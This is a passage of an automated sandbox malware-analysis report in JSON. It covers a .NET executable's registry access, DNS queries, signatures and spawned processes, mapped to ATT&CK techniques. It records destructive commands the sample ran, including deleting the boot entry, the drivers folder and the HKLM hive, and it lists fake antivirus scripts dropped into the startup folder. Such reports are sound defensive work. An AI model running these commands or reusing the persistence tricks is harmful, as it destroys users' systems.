\"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\"; Key: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\"; Key: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"archive.org\"\n \"ia800905.us.archive.org\"\n \"raw.githubusercontent.com\"\n \"vgmsite.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 47:F9:77:BB:69:BA:4B:44:A5:77:26:F5:CD:9C:0A:9A:07:B0:77:44; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Root Certificate Authority - G2, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 27:AC:93:69:FA:F2:52:07:BB:26:27:CE:FA:CC:BE:4E:F9:C3:19:B8; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 34:0B:28:80:F4:46:FC:C0:4E:59:ED:33:F5:2B:3D:08:D6:24:29:64; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 27:96:BA:E6:3F:18:01:E2:77:26:1B:A0:D7:77:70:02:8F:20:EE:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: A6:64:9E:2D:CD:D4:5A:90:6C:88:B1:DF:B8:C7:E7:B8:5F:03:8B:73; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\" (SHA1: 97:D8:C5:70:0F:12:24:6C:88:BC:FA:06:7E:8C:A7:4D:A8:62:67:28; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 1B:51:1A:BE:AD:59:C6:CE:20:70:77:C0:BF:0E:00:43:B1:38:26:12; see report for more information)\n The input sample is signed with a certificate issued by \"CN=R10, O=Let's Encrypt, C=US\" (SHA1: 06:1D:18:D6:F5:10:B0:6D:B1:F4:F2:9C:42:21:64:39:96:0C:AA:BF; see report for more information)\n The input sample is signed with a certificate issued by \"CN=ISRG Root X1, O=Internet Security Research Group, C=US\" (SHA1: 00:AB:EF:D0:55:F9:A9:C7:84:FF:DE:AB:D1:DC:DD:8F:ED:74:14:36; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xlsrvintl.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xlsrvintl.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"xlsrvintl.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" has an executable section named \".text\"\n \"xlsrvintl.dll\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"xlsrvintl.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startu ...\" (UID: 00000000-00005288)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005376)\n Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005364)\n Spawned process \"reg.exe\" with commandline \"reg delete \"HKCU\\\\Control Panel\\\\Desktop\" /V Wallpaper /f\" (UID: 00000000-00005004)\n Spawned process \"reg.exe\" with commandline \"reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Pol ...\" (UID: 00000000-00005608)\n Spawned process \"reg.exe\" with commandline \"ADD HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies ...\" (UID: 00000000-00005688)\n Spawned process \"rundll32.exe\" with commandline \"user32.dll,UpdatePerUserSystemParameters\" (UID: 00000000-00005500)\n Spawned process \"reg.exe\" with commandline \"reg delete hklm /f\" (UID: 00000000-00005524)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startu ...\" (UID: 00000000-00005288)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005376)\n Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005364)\n Spawned process \"reg.exe\" with commandline \"reg delete \"HKCU\\\\Control Panel\\\\Desktop\" /V Wallpaper /f\" (UID: 00000000-00005004)\n Spawned process \"reg.exe\" with commandline \"reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Pol ...\" (UID: 00000000-00005608)\n Spawned process \"reg.exe\" with commandline \"ADD HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies ...\" (UID: 00000000-00005688)\n Spawned process \"rundll32.exe\" with commandline \"user32.dll,UpdatePerUserSystemParameters\" (UID: 00000000-00005500)\n Spawned process \"reg.exe\" with commandline \"reg delete hklm /f\" (UID: 00000000-00005524)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Antivirus.bat\" \"\" (UID: 00000000-00005288)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005288) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"cmd.exe\" (UID: 00000000-00005288) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" was detected as \".NET\" and name: \"Library\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xlsrvintl.dll\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"xlsrvintl.dll\" was detected as \".NET\" and name: \"Library\"\n \"xlsrvintl.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"xlsrvintl.dll\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"xlsrvintl.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"xlsrvintl.dll\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"YourMom.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005808]\n Dropped file: \"Antivirus3.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005808]\n Dropped file: \"KasperskyScanner.hta\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005808]\n Dropped file: \"Antivirus2.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus2.vbs]- [targetUID: 00000000-00005808]\n Dropped file: \"YourMomIsGay.html\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005808]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" trying to touch file 